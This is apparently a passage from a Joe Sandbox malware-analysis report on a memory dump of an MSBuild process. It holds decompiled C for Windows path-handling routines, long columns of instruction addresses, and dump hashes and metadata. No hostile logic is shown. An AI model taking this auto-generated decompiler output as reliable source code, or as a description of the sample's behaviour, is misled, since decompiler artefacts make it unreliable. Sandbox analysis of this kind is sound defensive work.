															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E010EF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E010EF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01174CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E010FD130(_t427, _t494, _t511);
				}
			}










































































                                                                                                0x01175ba5
                                                                                                0x01175baa
                                                                                                0x01175baf
                                                                                                0x01175bb4
                                                                                                0x01175bb6
                                                                                                0x01175bbc
                                                                                                0x01175bbe
                                                                                                0x01175bc4
                                                                                                0x01175bcd
                                                                                                0x01175bd3
                                                                                                0x01175bd6
                                                                                                0x01175bdc
                                                                                                0x01175be0
                                                                                                0x01175be3
                                                                                                0x01175beb
                                                                                                0x01175bf2
                                                                                                0x01175bf8
                                                                                                0x01175bfe
                                                                                                0x01175c04
                                                                                                0x01175c0e
                                                                                                0x01175c18
                                                                                                0x01175c1f
                                                                                                0x01175c25
                                                                                                0x01175c2a
                                                                                                0x01175c2c
                                                                                                0x01175c32
                                                                                                0x01175c3a
                                                                                                0x01175c3f
                                                                                                0x01175c42
                                                                                                0x01175c48
                                                                                                0x01175c5b
                                                                                                0x01175c5b
                                                                                                0x01175c2c
                                                                                                0x01175cb7
                                                                                                0x01175cb9
                                                                                                0x01175cbf
                                                                                                0x01175cc2
                                                                                                0x01175cca
                                                                                                0x01175ccb
                                                                                                0x01175ccb
                                                                                                0x01175cd1
                                                                                                0x01175cd7
                                                                                                0x01175cda
                                                                                                0x01175ce1
                                                                                                0x01175ce4
                                                                                                0x01175ce7
                                                                                                0x01175ced
                                                                                                0x01175cf3
                                                                                                0x01175cf9
                                                                                                0x01175cff
                                                                                                0x01175d08
                                                                                                0x01175d0a
                                                                                                0x01175d0e
                                                                                                0x01175d10
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01175d16
                                                                                                0x01175d1a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01175d20
                                                                                                0x01175d22
                                                                                                0x01175d25
                                                                                                0x01175d2f
                                                                                                0x01175d2f
                                                                                                0x01175d33
                                                                                                0x01175d3d
                                                                                                0x01175d49
                                                                                                0x01175d4b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01175d5a
                                                                                                0x01175d5d
                                                                                                0x01175d60
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01175d66
                                                                                                0x01175d69
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01175d6f
                                                                                                0x01175d6f
                                                                                                0x01175d73
                                                                                                0x01175d79
                                                                                                0x01175d7f
                                                                                                0x01175d86
                                                                                                0x01175d95
                                                                                                0x01175d98
                                                                                                0x01175dba
                                                                                                0x01175dcb
                                                                                                0x01175dce
                                                                                                0x01175dd3
                                                                                                0x01175dd6
                                                                                                0x01175dd8
                                                                                                0x01175de6
                                                                                                0x01175dec
                                                                                                0x01175dee
                                                                                                0x01175df1
                                                                                                0x01175df3
                                                                                                0x0117635a
                                                                                                0x0117635a
                                                                                                0x00000000
                                                                                                0x0117635a
                                                                                                0x01175dfe
                                                                                                0x01175e02
                                                                                                0x01175e05
                                                                                                0x01175e07
                                                                                                0x01175e10
                                                                                                0x01175e13
                                                                                                0x01175e1b
                                                                                                0x01175e1c
                                                                                                0x01175e21
                                                                                                0x01175e22
                                                                                                0x01175e23
                                                                                                0x01175e25
                                                                                                0x01175e2a
                                                                                                0x01175e2c
                                                                                                0x01175e2e
                                                                                                0x01175e36
                                                                                                0x01175e39
                                                                                                0x01175e42
                                                                                                0x01175e47
                                                                                                0x01175e4d
                                                                                                0x01175e54
                                                                                                0x01175e54
                                                                                                0x01175e54
                                                                                                0x01175e2e
                                                                                                0x01175e5c
                                                                                                0x01175e5f
                                                                                                0x01175e62
                                                                                                0x01175e64
                                                                                                0x01175e6b
                                                                                                0x01175e70
                                                                                                0x01175e7a
                                                                                                0x01175e7a
                                                                                                0x01175e7a
                                                                                                0x01175e6b
                                                                                                0x01175e7e
                                                                                                0x01175e7f
                                                                                                0x01175e7f
                                                                                                0x01175e81
                                                                                                0x01175e87
                                                                                                0x01175e8b
                                                                                                0x01175e8c
                                                                                                0x01175e8c
                                                                                                0x01175e8c
                                                                                                0x01175e9a
                                                                                                0x01175e9c
                                                                                                0x01175ea2
                                                                                                0x01175ea6
                                                                                                0x01175f50
                                                                                                0x01175f50
                                                                                                0x01175f57
                                                                                                0x01175f66
                                                                                                0x01175f66
                                                                                                0x01175f66
                                                                                                0x01175f68
                                                                                                0x01175f6a
                                                                                                0x011763d0
                                                                                                0x00000000
                                                                                                0x01175f70
                                                                                                0x01175f70
                                                                                                0x01175f91
                                                                                                0x01175f9c
                                                                                                0x01175f9e
                                                                                                0x01175fa4
                                                                                                0x01175fa6
                                                                                                0x0117638c
                                                                                                0x01176392
                                                                                                0x011763a1
                                                                                                0x011763a7
                                                                                                0x011763af
                                                                                                0x011763af
                                                                                                0x011763bd
                                                                                                0x011763d8
                                                                                                0x00000000
                                                                                                0x011763d8
                                                                                                0x01175fac
                                                                                                0x01175fb2
                                                                                                0x01175fb4
                                                                                                0x01175fbd
                                                                                                0x01175fc6
                                                                                                0x01175fce
                                                                                                0x01175fd4
                                                                                                0x01175fdc
                                                                                                0x01175fec
                                                                                                0x01175fed
                                                                                                0x01175fee
                                                                                                0x01175fef
                                                                                                0x01175ff9
                                                                                                0x01175ffa
                                                                                                0x01175ffb
                                                                                                0x01175ffc
                                                                                                0x01176000
                                                                                                0x01176004
                                                                                                0x01176012
                                                                                                0x01176012
                                                                                                0x01176018
                                                                                                0x01176019
                                                                                                0x0117601a
                                                                                                0x0117601b
                                                                                                0x0117601c
                                                                                                0x01176020
                                                                                                0x01176059
                                                                                                0x0117605c
                                                                                                0x01176061
                                                                                                0x01176061
                                                                                                0x01176022
                                                                                                0x01176022
                                                                                                0x01176022
                                                                                                0x01176025
                                                                                                0x0117602a
                                                                                                0x0117602b
                                                                                                0x01176031
                                                                                                0x01176037
                                                                                                0x01176038
                                                                                                0x0117603e
                                                                                                0x01176048
                                                                                                0x01176049
                                                                                                0x0117604a
                                                                                                0x0117604b
                                                                                                0x0117604c
                                                                                                0x0117604d
                                                                                                0x01176053
                                                                                                0x01176054
                                                                                                0x01176054
                                                                                                0x01176062
                                                                                                0x01176065
                                                                                                0x01176067
                                                                                                0x0117606a
                                                                                                0x01176070
                                                                                                0x01176075
                                                                                                0x01176076
                                                                                                0x01176081
                                                                                                0x01176087
                                                                                                0x01176095
                                                                                                0x01176099
                                                                                                0x0117609e
                                                                                                0x011760a4
                                                                                                0x011760ae
                                                                                                0x011760b0
                                                                                                0x011760b3
                                                                                                0x011760b6
                                                                                                0x011760b8
                                                                                                0x011760ba
                                                                                                0x011760ba
                                                                                                0x011760ba
                                                                                                0x011760ba
                                                                                                0x011760be
                                                                                                0x011760c0
                                                                                                0x011760c5
                                                                                                0x011760c5
                                                                                                0x011760c5
                                                                                                0x011760c6
                                                                                                0x011760cd
                                                                                                0x01176114
                                                                                                0x011760cf
                                                                                                0x011760cf
                                                                                                0x011760d4
                                                                                                0x011760d5
                                                                                                0x011760da
                                                                                                0x011760db
                                                                                                0x011760e1
                                                                                                0x011760e2
                                                                                                0x011760e8
                                                                                                0x011760f8
                                                                                                0x011760fd
                                                                                                0x011760fe
                                                                                                0x01176102
                                                                                                0x01176104
                                                                                                0x01176107
                                                                                                0x01176109
                                                                                                0x0117610b
                                                                                                0x0117610b
                                                                                                0x0117610b
                                                                                                0x0117610b
                                                                                                0x0117610f
                                                                                                0x0117610f
                                                                                                0x01176117
                                                                                                0x0117611a
                                                                                                0x0117611f
                                                                                                0x01176125
                                                                                                0x01176134
                                                                                                0x01176139
                                                                                                0x0117613f
                                                                                                0x01176146
                                                                                                0x01176148
                                                                                                0x0117614b
                                                                                                0x0117614d
                                                                                                0x0117614f
                                                                                                0x0117614f
                                                                                                0x0117614f
                                                                                                0x0117614f
                                                                                                0x01176153
                                                                                                0x01176159
                                                                                                0x01176159
                                                                                                0x0117615c
                                                                                                0x01176163
                                                                                                0x01176169
                                                                                                0x0117616c
                                                                                                0x01176172
                                                                                                0x01176181
                                                                                                0x01176186
                                                                                                0x01176187
                                                                                                0x0117618b
                                                                                                0x01176191
                                                                                                0x01176195
                                                                                                0x011761a3
                                                                                                0x011761bb
                                                                                                0x011761c0
                                                                                                0x011761c3
                                                                                                0x011761cc
                                                                                                0x011761d0
                                                                                                0x011761dc
                                                                                                0x011761de
                                                                                                0x011761e1
                                                                                                0x011761e4
                                                                                                0x011761e6
                                                                                                0x011761e8
                                                                                                0x011761e8
                                                                                                0x011761e8
                                                                                                0x011761e8
                                                                                                0x011761e6
                                                                                                0x011761ec
                                                                                                0x011761f3
                                                                                                0x01176203
                                                                                                0x01176209
                                                                                                0x0117620a
                                                                                                0x01176216
                                                                                                0x0117621d
                                                                                                0x01176227
                                                                                                0x01176241
                                                                                                0x01176246
                                                                                                0x0117624c
                                                                                                0x01176257
                                                                                                0x01176259
                                                                                                0x0117625c
                                                                                                0x0117625e
                                                                                                0x01176260
                                                                                                0x01176260
                                                                                                0x01176260
                                                                                                0x01176260
                                                                                                0x0117625e
                                                                                                0x01176264
                                                                                                0x01176267
                                                                                                0x01176269
                                                                                                0x01176315
                                                                                                0x01176315
                                                                                                0x0117631b
                                                                                                0x0117631e
                                                                                                0x01176324
                                                                                                0x01176327
                                                                                                0x0117632f
                                                                                                0x01176330
                                                                                                0x01176333
                                                                                                0x0117633a
                                                                                                0x0117633c
                                                                                                0x01176335
                                                                                                0x01176335
                                                                                                0x01176335
                                                                                                0x0117633f
                                                                                                0x01176342
                                                                                                0x0117634c
                                                                                                0x01176352
                                                                                                0x01176355
                                                                                                0x01176355
                                                                                                0x01176359
                                                                                                0x00000000
                                                                                                0x0117626f
                                                                                                0x01176275
                                                                                                0x01176275
                                                                                                0x01176278
                                                                                                0x0117627e
                                                                                                0x0117627e
                                                                                                0x01176281
                                                                                                0x01176287
                                                                                                0x0117628d
                                                                                                0x01176298
                                                                                                0x0117629c
                                                                                                0x011762a2
                                                                                                0x0117629e
                                                                                                0x0117629e
                                                                                                0x0117629e
                                                                                                0x011762a7
                                                                                                0x011762a7
                                                                                                0x011762aa
                                                                                                0x011762b0
                                                                                                0x011762f0
                                                                                                0x011762f0
                                                                                                0x011762f2
                                                                                                0x011762f8
                                                                                                0x011762fd
                                                                                                0x011762b2
                                                                                                0x011762b2
                                                                                                0x011762b2
                                                                                                0x011762b5
                                                                                                0x011762dd
                                                                                                0x011762e2
                                                                                                0x011762e5
                                                                                                0x011762b7
                                                                                                0x011762b8
                                                                                                0x011762bb
                                                                                                0x011762bd
                                                                                                0x011762c0
                                                                                                0x011762c4
                                                                                                0x011762cd
                                                                                                0x011762cd
                                                                                                0x011762c0
                                                                                                0x011762bb
                                                                                                0x011762b5
                                                                                                0x01176302
                                                                                                0x01176303
                                                                                                0x01176305
                                                                                                0x01176305
                                                                                                0x01176305
                                                                                                0x0117630c
                                                                                                0x0117630c
                                                                                                0x00000000
                                                                                                0x0117627e
                                                                                                0x01176269
                                                                                                0x01175eac
                                                                                                0x01175ebb
                                                                                                0x01175ebe
                                                                                                0x01175ecb
                                                                                                0x01175ecb
                                                                                                0x01175ece
                                                                                                0x01175ece
                                                                                                0x01175ed4
                                                                                                0x01175ed7
                                                                                                0x01175ed9
                                                                                                0x01175edb
                                                                                                0x01175edb
                                                                                                0x01175ee1
                                                                                                0x01175ee1
                                                                                                0x01175ee3
                                                                                                0x01175f20
                                                                                                0x01175f20
                                                                                                0x01175ee5
                                                                                                0x01175ee5
                                                                                                0x01175ee5
                                                                                                0x01175ee8
                                                                                                0x01175f11
                                                                                                0x01175f18
                                                                                                0x01175eea
                                                                                                0x01175eea
                                                                                                0x01175eed
                                                                                                0x01175ef2
                                                                                                0x01175ef8
                                                                                                0x01175efb
                                                                                                0x01175f0a
                                                                                                0x01175f0a
                                                                                                0x01175eed
                                                                                                0x01175ee8
                                                                                                0x01175f22
                                                                                                0x01175f28
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01175f30
                                                                                                0x01175f31
                                                                                                0x01175f37
                                                                                                0x01175f3a
                                                                                                0x01175f3d
                                                                                                0x01175f44
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01175f46
                                                                                                0x01175f48
                                                                                                0x01175f4d
                                                                                                0x00000000
                                                                                                0x01175f4d
                                                                                                0x01175dda
                                                                                                0x01175ddf
                                                                                                0x00000000
                                                                                                0x01175ddf
                                                                                                0x01175dd8
                                                                                                0x01175da7
                                                                                                0x01175da9
                                                                                                0x01175dac
                                                                                                0x01175dae
                                                                                                0x00000000
                                                                                                0x01175db4
                                                                                                0x01175db4
                                                                                                0x00000000
                                                                                                0x01175db4
                                                                                                0x01175dae
                                                                                                0x01175d88
                                                                                                0x01175d8d
                                                                                                0x01176363
                                                                                                0x01176369
                                                                                                0x0117636a
                                                                                                0x01176370
                                                                                                0x01176372
                                                                                                0x0117637a
                                                                                                0x0117637b
                                                                                                0x0117637d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0117637f
                                                                                                0x01176385
                                                                                                0x00000000
                                                                                                0x01176385
                                                                                                0x01175d38
                                                                                                0x01175d3b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01175d3b
                                                                                                0x01175d27
                                                                                                0x01175d29
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01176360
                                                                                                0x00000000
                                                                                                0x01176360
                                                                                                0x01175c10
                                                                                                0x01175c10
                                                                                                0x011763da
                                                                                                0x011763e5
                                                                                                0x011763e5

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 17149186cfd306f76270ae115783bf4372833a8c38021f44571f10a88cfc786a
                                                                                                • Instruction ID: 917e93f9ebd2d52475a86d0c5675fe54775d48b52a420a25e1e0f1856eda28af
                                                                                                • Opcode Fuzzy Hash: 17149186cfd306f76270ae115783bf4372833a8c38021f44571f10a88cfc786a
                                                                                                • Instruction Fuzzy Hash: 4E426B71900629CFEB68CF68C880BA9BBB1FF49304F1581AAD94DEB342D7349985CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010C4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E010C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x119d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E010DF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E010C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L010C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E010C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M010C45F8))) {
												case 0:
													_v568 = 0x1081078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x10811c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L010C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E010EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E010EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E010A52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E010BEB70(1, 0x11979a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E010BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E010E95D0();
																			L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E010EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E010E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E010EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                                0x010c4128
                                                                                                0x010c4135
                                                                                                0x010c413c
